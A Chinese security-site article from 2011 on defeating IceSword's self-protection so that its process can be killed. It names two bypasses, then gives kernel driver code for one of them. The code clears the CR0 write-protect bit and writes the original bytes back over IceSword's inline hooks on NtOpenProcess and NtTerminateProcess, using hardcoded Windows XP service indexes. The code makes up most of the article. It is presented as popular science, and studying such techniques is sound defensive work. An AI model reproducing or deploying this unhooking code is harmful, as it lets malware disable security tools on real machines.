移动安全 安全管理 应用案例网络威胁 系统安全 应用安全 数据安全 云安全
当前位置: 主页 > 信息安全 > 网络威胁 >

突破IceSword自身进程的保护方法

时间:2011-05-03 15:15来源: 点击:
IceSword的驱动对其自身进程做了保护,使恶意程序终止不了他。IceSword没有用HOOK SSDT的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess几个函数,即修改函数前即修改函数前5个字节。
Tags黑客攻防(516)IceSword(7)进程(15)  

  IceSword的驱动对其自身进程做了保护,使恶意程序终止不了他。IceSword没有用HOOK SSDT的方法,不过也没用什么太变态的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess几个函数,即修改函数前5个字节,jmp到他自定义处理函数例程里。

  终止采用这类保护方法的进程,可以使用暴力的PspTerminateProcess方法,PspTerminateProcess函数未导出,需要我们自己穷举特征码搜索来定位,或者硬编码之。当然,我们还可以恢复IceSword的Inline hook,还原被IceSword挂钩过的NtOpenProcess、NtTerminateProcess函数,然后在用户态上使用普通的终止进程的方法就可以终止他了。这里给出了第二中方法的具体代码,不过由于此篇文章出于科普目的,代码就写得马虎点了,仅适用于Windows XP,因为取SSDT对应的函数索引号用的硬编码,说明问题而已。NtTerminateProcess未导出,大家可以自己改成通过读取ntdll.dll动态通用的获得索引号的方法,方法网上有公开,需要的人就自己动点手吧。

  CODE:

  #include

  #define DWORD unsigned long

  unsigned char OldCode[5]="\x68\xc4\x00\x00\x00";

  unsigned char OldCode2[5]="\x8b\xff\x55\x8b\xec";

  #pragma pack(1)

  typedef struct ServiceDescriptorEntry {

  unsigned int *ServiceTableBase;

  unsigned int *ServiceCounterTableBase;

  unsigned int NumberOfServices;

  unsigned char *ParamTableBase;

  } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;

  #pragma pack()

  __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

  NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING

  theRegistryPath )

  {

  DWORD OpAddr,OpAddr2;

  OpAddr=*(KeServiceDescriptorTable.ServiceTableBase + 0x7A);

  OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase + 0x101);

  _asm

  {

  CLI

  MOV eax, CR0

  AND eax, NOT 10000H

  MOV CR0, eax

  pushad

  mov edi, OpAddr

  mov eax, dword ptr OldCode[0]

  mov [edi], eax

  mov al, byte ptr OldCode[4]

  mov [edi+4], al

  mov edi, OpAddr2

  mov eax, dword ptr OldCode2[0]

  mov [edi], eax

  mov al, byte ptr OldCode2[4]

  mov [edi+4], al

  popad

  MOV eax, CR0

  OR eax, 10000H

  MOV CR0, eax

  STI

  }

  return STATUS_SUCCESS;

  }

------分隔线----------------------------

推荐内容